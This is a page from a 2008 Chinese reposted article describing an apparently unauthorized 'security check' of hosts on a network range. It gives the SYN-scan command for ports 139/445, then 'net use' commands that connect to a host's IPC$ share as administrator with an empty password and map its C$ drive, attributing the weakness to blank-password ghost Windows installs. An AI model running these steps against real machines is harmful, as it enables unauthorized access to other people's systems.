令人堪忧的网络安全 一次非常规安全检测 |
|
作者:未知 文章来源:网络文摘 更新时间:2008-9-2 1:45:36 |
【声明:转载此信息在于传递更多信息,其内容表达的观点并不代表本站立场,由这些信息所产生的一切后果本站不负任何责任。如果您对本信息有什么意见,欢迎和本站联系,谢谢!】http://CiDu.Net
2、IPC$测试(139 445端口)
第一步:在命令提示符下运行s扫描器,敲入如下命令:
s syn **.1**.133.1 **.1**.138.254 139 445
同样时间很短,结果马上出来了,开445端口的比3389的更多,粗略算了一下,超过80%,让人大跌眼镜的是这些主机3389、135都开放!(图4)
图4
第二步:随机找一个ip,在“命令提示符”下运行如下命令:
net use \\**.1**.135.253\ipc$ "" /user:administrator
提示“命令成功完成”
继续敲入命令:
net use z: \\**.1**.135.253\c$
提示“命令成功完成”(图5)
图5
这样就把它的系统盘映射到本机,检测到此为止。都到了这一步还有什么不能做的呢,这台主机就算系统沦陷了。
分析:这也是“ghost系统”或“电脑城系统”的后遗症,于管理员组的两个用户“administrator”、“new”都为空密码。电脑用户缺乏基本的电脑安全意识,更没有防范意识,请有方面的人来进行配置,系统安装完成不做任何配置就上网逛了,能不被黑吗?
上一页 [1] [2] [3] [4] [5] 下一页
声明:以上信息资料大都是网上搜集而来,版权归作者,如有版权问题请留言告知我将马上改正。 文中所提到的各种观点只是原文观点,各种说法未经一一确认。并不代表本站认可此观点!!
|
资讯录入:admin 责任编辑:admin |
|
上一篇资讯: 端口扫描器为服务器进行安全体检
下一篇资讯: Windows2003服务器安装及设置教程 |
【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |